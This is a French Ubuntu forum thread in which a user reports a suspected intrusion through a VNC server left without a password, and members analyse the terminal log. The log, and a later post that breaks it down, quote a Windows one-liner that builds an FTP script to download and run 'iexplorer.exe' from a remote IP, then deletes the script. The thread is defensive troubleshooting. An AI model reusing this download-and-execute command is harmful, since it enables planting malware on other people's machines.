Quelqu'un est rentré dans mon pc ....

jmarshallh · Le 09/10/2014, à 02:18

Bonsoir tout le monde
peu de connaissances linux , neanmoins ...

quelqu'un peut il m'eclaircir :
voici le topo :

j'ai Ubuntu 12.04 LTS qui tournait, relié via Vnc viewer ouvert sous mon PC win7,
je m'appretais à aller eteindre ma machine ubuntu (qui me sert de serveur apache pour owncloud ) et j'ai trouvé ca sur mon prompt :

jmarshallh@jmarshallh-ASUS:~$ 7~
7~ : commande introuvable
jmarshallh@jmarshallh-ASUS:~$ %systemroot%\system32\cmd.exe
bash: fg: %systemroot%system32cmd.exe : tâche inexistante
jmarshallh@jmarshallh-ASUS:~$ del eq&echo open 192.168.137.145 13742 >> eq&echo user 14972 11168 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
[1] 3813
[2] 3814
[3] 3815
[4] 3817
[5] 3818
[6] 3819
[7] 3820
ftp: s: unknown option
Commande 'del' non trouvée, vouliez-vous dire :
La commande 'mdel' du paquet 'mtools' (main)
La commande 'delp' du paquet 'fp-utils-2.4.4' (universe)
La commande 'el' du paquet 'oneliner-el' (universe)
La commande 'tel' du paquet 'orville-write' (universe)
La commande 'deal' du paquet 'deal' (universe)
La commande 'hdel' du paquet 'hfsutils' (main)
La commande 'bel' du paquet 'belier' (universe)
La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
La commande 'qdel' du paquet 'gridengine-client' (universe)
La commande 'qdel' du paquet 'torque-client-x11' (universe)
La commande 'qdel' du paquet 'torque-client' (universe)
del : commande introuvable
Commande 'del' non trouvée, vouliez-vous dire :
La commande 'mdel' du paquet 'mtools' (main)
La commande 'delp' du paquet 'fp-utils-2.4.4' (universe)
La commande 'el' du paquet 'oneliner-el' (universe)
La commande 'tel' du paquet 'orville-write' (universe)
La commande 'deal' du paquet 'deal' (universe)
La commande 'hdel' du paquet 'hfsutils' (main)
La commande 'bel' du paquet 'belier' (universe)
La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
La commande 'qdel' du paquet 'gridengine-client' (universe)
La commande 'qdel' du paquet 'torque-client-x11' (universe)
La commande 'qdel' du paquet 'torque-client' (universe)
del : commande introuvable
[1] Termine 127 del eq
[2] Fini echo open 192.168.137.145 13742 >> eq
[3] Fini echo user 14972 11168 >> eq
[4] Fini echo get iexplorer.exe >> eq
[5] Fini echo quit >> eq
[6]- Termine 1 ftp -n -s:eq
jmarshallh@jmarshallh-ASUS:~$
jmarshallh@jmarshallh-ASUS:~$ iexplorer.exe : commande introuvable
7~

le gars il a essayé de faire quoi en fait ?
rapport quelconque avec Vnc viewer installé sur mon win7 ?
bot ? ou intrusion ?
pour le moment je ne vais toucher à rien sur mes configs , rien de tres confidentiel dans mes machines ....

please help me !! rassurez moi ou non , mais svp dites moi qqchose

merci par avance a tous

tiramiseb · Le 09/10/2014, à 09:24

Salut,

Tu as déjà posté ça dans un autre fil de discussion :
http://forum.ubuntu-fr.org/viewtopic.ph … #p18240211
J'y ai répondu dans cet autre fil de discussion. Évite les doublons.

Vu qu'il vaut mieux mettre un problème par discussion, je recopie ici ma réponse dans l'autre fil...

------------------------------------

Bonjour jmarshallh,

le gars il a essayé de faire quoi en fait ?

Aucune idée mais il croyait être sur un Windows.
On dirait qu'il a voulu télécharger une version vérolée d'Internet Explorer pour la placer sur ton PC. Ça

rapport quelconque avec Vnc viewer installé sur mon win7 ?

Si quelqu'un a pu avoir accès à ton Windows, alors il a pu croire que c'est une invite de commande de Windows.

bot ? ou intrusion ?

Difficile à dire comme ça.
Ta machine est-elle à jour ?

Dans ton cas, c'est l'utilisation d'une adresse IP locale qui m'étonne. Tu connais des adresses locales en 192.168.137.x ?

Dernière modification par tiramiseb (Le 09/10/2014, à 09:25)

tiramiseb · Le 09/10/2014, à 09:26

(et c'est quoi cette manie de laisser des terminaux ouverts sur des machines distantes !?)

jmarshallh · Le 09/10/2014, à 11:06

tout d'abord merci de votre réponse
mes excuses pour le doublon

ubuntu doit etre a jour
seven je ne suis pas sur

les ip locales en 192.168.137.x ne correspondent pas du tout à mon Lan

bon j'ai oublié de preciser que VNc etait autorisé d'acceder à mon Ubuntu SAns Mot de Passe .....

aie je sens que je vais me faire taper sur les doigts ... je corrigerai ca au plus vite

dois je tout reinstaller ?

le gars a t il reussi ? car j'ai l'impression que ses commandes ont echoué dans le log non ?

merci bcp

tiramiseb · Le 09/10/2014, à 11:10

dois je tout reinstaller ?

Non, je ne pense pas ; par contre il faut vérifier les mises à jour, mettre des mots de passe sécurisés.

le gars a t il reussi ?

Non.

ssdg · Le 09/10/2014, à 21:36

%systemroot%\system32\cmd.exe
del eq &
echo open 192.168.137.145 13742 >> eq &
echo user 14972 11168 >> eq &
echo get iexplorer.exe >> eq &
echo quit >> eq &
ftp -n -s:eq &
iexplorer.exe &
del eq

Ce que ça fait c'est créer un fichier de commandes SSH qui décrit comment récupérer un fichier iexplorer.exe ( sans doute pour se camoufler dans la liste des processus (ce mec n'est pas sérieux, le navigateur windows ne s'appelle pas comme ça.))
Il se connecte via FTP (une recherche sur google te donne les détails de -n et -s)
et lance le fichier qu'il a téléchargé avant de nettoyer le fichier de commandes ftp. (mais laissant iexplorer.)

J'aurais tendance à dire que c'est un bot qui à réussi à se logger sur ton serveur VNC. Je ne sais pas où est ta machine sous ubuntu, mais j'ai l'impression que:
1) tu l'a configuré avec les pieds et exposée sur internet. (à poil dans la foret... Et pas celle des bisounours)
2) si ce bot pour windows à échoué, ça ne veut pas dire qu'un pour unix-likes n'est pas passé et n'a pas vérolé ta machine jusqu'à la moelle.

Désolé.

tiramiseb · Le 09/10/2014, à 21:37

J'aurais tendance à dire que c'est un bot qui à réussi à se logger sur ton serveur VNC.

C'est peut-être le plus probable...

D'ailleurs, il semblerait alors logique que « 7~ » corresponde au raccourci nécessaire pour faire la même chose que "Démarrer -> Exécuter", non ?

Dernière modification par tiramiseb (Le 09/10/2014, à 21:39)

jmarshallh · Le 10/10/2014, à 00:05

bonsoir et merci a tous pour l'interet que vous portez à mon sujet

ssdg a écrit :

1) tu l'a configuré avec les pieds et exposée sur internet. (à poil dans la foret... Et pas celle des bisounours)
2) si ce bot pour windows à échoué, ça ne veut pas dire qu'un pour unix-likes n'est pas passé et n'a pas vérolé ta machine jusqu'à la moelle.

je suis loin de tout comprendre mais il me semblait avoir forcé l'acces à Owncloud par https
(dois je faire de meme pour apache ?)
mon acces est derriere une box sur laquelle j'ai cree des regles de nat pour le serveur web et le https port 443

du coup j'ai fait les dernieres mises a jour sous ubuntu 12.04 LTS
j'ai mis un mot de passe pour acces Bureau a Distance d 'ubuntu
je ne laisserais plus un prompt ouvert tout le temps

ca craint vraiment ? comme j'ai pas grand chose d'installé sur ce pc , ne devrais pas tout reprendre à zero et reinstaller Ubuntu ?

comment ameliorer ma config autrement qu'avec mes pieds ( lol )

merci a bientot , cordialement

[EDIT1] :j'ai verifié je ne suis pas concerné par la faille bash
[EDIT2]: ssh server installé, et modifié : changement du port par defaut , fail2ban , et permitroot acces no ....
par contre j'ai pas encore fais le lien avec mon serveur ...

Dernière modification par jmarshallh (Le 10/10/2014, à 00:22)

voxpopuli · Le 10/10/2014, à 12:35

Si tu veux augmenter ta sécurité, garde le proverbe de Vauban: "Une défense ne peut être impénétrable, mais on peut compliquer suffisamment le boulot de l'attaquant pour le motiver a choisir une autre cible."

ssdg · Le 12/10/2014, à 01:19

ton serveur à un VNC installé, si j'ai bien compris. La sécurité de VNC n'est pas, à ma connaissance, sérieuse. L'attaquant (celui qui à essayé de lancer son "iexplorer.exe" mais aussi l'attaquant potentiel qui à pu infecter ta machine) n'est sans doute pas passé par owncloud mais VNC
Surtout si tu arrive à te souvenir de ton mot de passe. (en fait, un truc constitué de mots, même en l33t n'est souvent pas suffisant pour resister à une attaque par dictionnaire).

Pour la question de la console, si le mec à réussi à atteindre ton VNC, il peut très bien démarrer une console. (tu y arrive bien et il a réussi à avoir les mêmes accès que toi)

Si tu veux continuer à avoir un VNC installé, je crois qu'il existe des moyens pour qu'il ne soit accessible que par SSH. (avec un système de clefs privées, c'est déjà plus sérieux)

Pour ce qui est de réinstaller ubuntu, j'aurais tendance à le faire. puis réinstaller tout à partir des sources (si tu as installé des applis PHP ) pour éviter d'embarquer un code qui peut avoir été modifié.

Pour ce qui est des données, backup préalable, vérification des scripts de BDD (on ne sais jamais). et de tout ce qui peut être exécuté ou interprété (scripts, .sh, .php, python et codes sources que tu aurais écrit)

Je sais que c'est lourd, mais tu as détecté un truc sérieux. (et tu as de la chance que ce mec aie échoué et te fasse prendre conscience que ta machine est compromise)

tiramiseb · Le 12/10/2014, à 08:20

Salut,

Dans la mesure où le script qu'on a vu était fait pour Windows, je ne pense pas que la machine soit compromise.

En fait, si j'ai tout compris, il s'est passé la chose suivante :

- un script a vu un serveur VNC ouvert
- le script s'est connecté au serveur VNC
- le script a déroulé les opérations nécessaires pour corrompre la machine si c'était un Windows, à l'aveugle
- ça n'a pas marché car ce n'est pas un Windows

En fait, s'il n'y avait pas eu un terminal ouvert, tu n'aurais pas vu cette tentative de corruption de la machine...

Par contre, en tout état de cause, il faut sécuriser ta machine et arrêter de laisser des ports ouverts comme un moulin !

jmarshallh · Le 12/10/2014, à 13:11

oki merci à tous !

je vais donc reinitialiser à zero mon pc
reprendre tout depuis le debut en mettant l'accent sur la sécurité

je me pencherai sur un vnc sécurisé ssh

merci à tous pour les conseils !

_Raum_ · Le 14/10/2014, à 10:59

Ah tient une question par rapport à ton problème.... C'est quoi cette adresse "192.168.137.145" ? Ton pécé tente une connexion sur cette adresse, tu as d'autres pécés sur ton réseau ?

Dernière modification par _Raum_ (Le 14/10/2014, à 11:09)

tiramiseb · Le 14/10/2014, à 11:06

_Raum_: j'ai posé cette question à la fin de mon message #2. En #4, jmarshallh a indiqué que ça ne correspond pas à son LAN.

_Raum_ · Le 14/10/2014, à 11:09

Désolé, il est vrai que je n'ai pas tout lu....

Après recherche, certains pensent à une faille VNC, d'autres à une faille Firefox par rapport à javascript (qui envoie des touches au système, un "keystroke")

tiramiseb · Le 14/10/2014, à 11:10

Pour ma part je pense que le serveur VNC était ouvert à tout vent (ou presque), qu'un bot a vu ça, qu'il a essayé de s'y installer en croyant que c'est un Windows.
Quand on laisse une porte ouverte, des bestioles entrent dans la maison...

jmarshallh · Le 16/10/2014, à 11:01

bonjour , en cherchant dans Google : regardez ca : http://www.fobec.com/apps/localiser-ip/192.168.137.145

sinon j'ai tout remis à 0 ... et meme je suis passé sous Debian ... tout réinstallé ... vous me direz si c'est sécurisé cette fois ci ...

merci

ssdg · Le 16/10/2014, à 12:06

Le changement d'OS n'est pas forcément le point critique, c'est plutot la configuration de VNC qui va jouer.

tiramiseb · Le 16/10/2014, à 14:08

bonjour , en cherchant dans Google : regardez ca : http://www.fobec.com/apps/localiser-ip/192.168.137.145

Qu'y a-t-il à voir ?
C'est une plage privée, on te l'a déjà dit. Qu'est-ce qu'on devrait apprendre avec ça ?

je suis passé sous Debian ... tout réinstallé ... vous me direz si c'est sécurisé cette fois ci ...

Si tu remets les mêmes logiciels, ouverts de la même manière, ça ne change rien.

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#1 Le 09/10/2014, à 02:18

Quelqu'un est rentré dans mon pc ....

#2 Le 09/10/2014, à 09:24

Re : Quelqu'un est rentré dans mon pc ....

#3 Le 09/10/2014, à 09:26

Re : Quelqu'un est rentré dans mon pc ....

#4 Le 09/10/2014, à 11:06

Re : Quelqu'un est rentré dans mon pc ....

#5 Le 09/10/2014, à 11:10

Re : Quelqu'un est rentré dans mon pc ....

#6 Le 09/10/2014, à 21:36

Re : Quelqu'un est rentré dans mon pc ....

#7 Le 09/10/2014, à 21:37

Re : Quelqu'un est rentré dans mon pc ....

#8 Le 10/10/2014, à 00:05

Re : Quelqu'un est rentré dans mon pc ....

#9 Le 10/10/2014, à 12:35

Re : Quelqu'un est rentré dans mon pc ....

#10 Le 12/10/2014, à 01:19

Re : Quelqu'un est rentré dans mon pc ....

#11 Le 12/10/2014, à 08:20

Re : Quelqu'un est rentré dans mon pc ....

#12 Le 12/10/2014, à 13:11

Re : Quelqu'un est rentré dans mon pc ....

#13 Le 14/10/2014, à 10:59

Re : Quelqu'un est rentré dans mon pc ....

#14 Le 14/10/2014, à 11:06

Re : Quelqu'un est rentré dans mon pc ....

#15 Le 14/10/2014, à 11:09

Re : Quelqu'un est rentré dans mon pc ....

#16 Le 14/10/2014, à 11:10

Re : Quelqu'un est rentré dans mon pc ....

#17 Le 16/10/2014, à 11:01

Re : Quelqu'un est rentré dans mon pc ....

#18 Le 16/10/2014, à 12:06

Re : Quelqu'un est rentré dans mon pc ....

#19 Le 16/10/2014, à 14:08

Re : Quelqu'un est rentré dans mon pc ....

Pied de page des forums